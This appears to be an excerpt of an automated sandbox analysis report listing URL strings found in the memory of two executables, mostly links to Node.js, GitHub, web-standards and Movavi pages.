Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://edu.movavi.com.
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://edu.movavi.com/
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://edu.movavi.com/.
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://encoding.spec.whatwg.org
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://encoding.spec.whatwg.org/#textdecoder
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://encoding.spec.whatwg.org/#textencoder
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://esdiscuss.org/topic/isconstructor#content-11
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://fetch.spec.whatwg.org/
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://gist.github.com/XVilka/8346728#gistcomment-2823421
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/WICG/scheduling-apis
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/WebAssembly/esm-integration/issues/42
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/acornjs/acorn/blob/master/acorn/src/identifier.js#L23
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/acornjs/acorn/issues/575
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/addaleax/eventemitter-asyncresource
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/antirez/linenoise
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/chalk/ansi-regex/blob/HEAD/index.js
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/chalk/supports-color
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/chromium/chromium/blob/HEAD/third_party/blink/public/platform/web_crypto_algorith
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/da-x/rxvt-unicode/tree/v9.22-with-24bit-color
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/estree/estree/blob/a27003adf4fd7bfad44de9cef372a2eacd527b1c/es5.md#regexpliteral
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.js
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/startSES.js
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/google/closure-compiler/wiki/Source-Maps
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/isaacs/color-support.
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/joyent/node/issues/3295.
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/libuv/libuv/pull/1501.
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/mafintosh/end-of-stream
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/mafintosh/pump
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/mysticatea/abort-controller
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node-v0.x-archive/issues/2876.
Source: pKxhpP0spW.exe, 00000001.00000003.2382394323.000000323D781000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/blob/1a96d83a223ff9f05f7d942fb84440d323f7b596/lib/internal/bootstrap/
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/commit/ec2822adaad76b126b5cccdeaa1addf2376c9aa6
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/10673
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/13435
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/19009
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/2006
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/2119
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/31074
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/3392
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/34532
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/35475
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/35862
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/35981
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/39707
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/39758
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/12342
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/12607
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/13870#discussion_r124515293
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/1771#issuecomment-119351671
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/21313
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/26334.
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/30380#issuecomment-552948364
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/30958
Source: pKxhpP0spW.exe, 00000001.00000003.2382394323.000000323D781000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/33229
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/33515.
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/33661
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/3394
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/34010
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/34103#issuecomment-652002364
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/34375
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/34385
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/35949#issuecomment-722496598
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/36061#discussion_r533718029
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/38248
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/38433#issuecomment-828426932
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/38614)
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/standard-things/esm/issues/821.
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/tc39/ecma262/blob/HEAD/LICENSE.md
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/tc39/ecma262/issues/1209
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/tc39/proposal-iterator-helpers/issues/169
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/tc39/proposal-ses/blob/e5271cc42a257a05dcae2fd94713ed2f46c08620/shim/src/freeze.j
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/tc39/proposal-weakrefs
Source: pKxhpP0spW.exe, 00000001.00000003.2382394323.000000323D781000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/vercel/pkg/issues/1589
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://goo.gl/t5IS6M).
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#Replaceable
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#define-the-operations
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#dfn-class-string
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#dfn-default-iterator-object
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#dfn-iterator-prototype-object
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-interfaces
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-iterable
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-iterable-entries
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-iterators
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-namespaces
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-operations
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-stringifier
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#ascii-serialisation-of-an-origin
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#concept-origin-opaque
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://invisible-island.net/ncurses/terminfo.ti.html#toc-_Specials
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://invisible-island.net/xterm/ctlseqs/ctlseqs.html
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://jimmy.warting.se/opensource
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://linux.die.net/man/1/dircolors).
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: https://movavi.com0/
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://no-color.org/
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://nodejs.org/
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode).
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://nodejs.org/api/fs.html
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://nodejs.org/api/fs.html#fs_stat_time_values)
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://nodejs.org/download/release/v16.16.0/node-v16.16.0-headers.tar.gz
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://nodejs.org/download/release/v16.16.0/node-v16.16.0.tar.gz
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://nodejs.org/download/release/v16.16.0/node-v16.16.0.tar.gzhttps://nodejs.org/download/release
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://nodejs.org/download/release/v16.16.0/win-x64/node.lib
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://rogueamoeba.com/licensing.
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://rogueamoeba.com/licensing/
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://rogueamoeba.com/licensing/.
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://sourcemaps.info/spec.html
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://stackoverflow.com/a/5501711/3561
Source: motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000002.2598521100.000002144CEB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.movavi.com/resources/webinstaller/release/movavi/vs/vs_win_x64/resources/config.ini
Source: motor1.exe, 00000015.00000002.2598521100.000002144CEB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.movavi.com/resources/webinstaller/release/movavi/vs/vs_win_x64/resources/config.ini4
Source: motor1.exe, 00000004.00000003.2451740824.0000022D5F540000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.movavi.com/resources/webinstaller/release/movavi/vs/vs_win_x64/resources/config.init1
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://tc39.es/ecma262/#sec-%typedarray%-intrinsic-object
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://tc39.es/proposal-iterator-helpers/#sec-iteratorprototype.some
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://tc39.github.io/ecma262/#sec-%iteratorprototype%-object
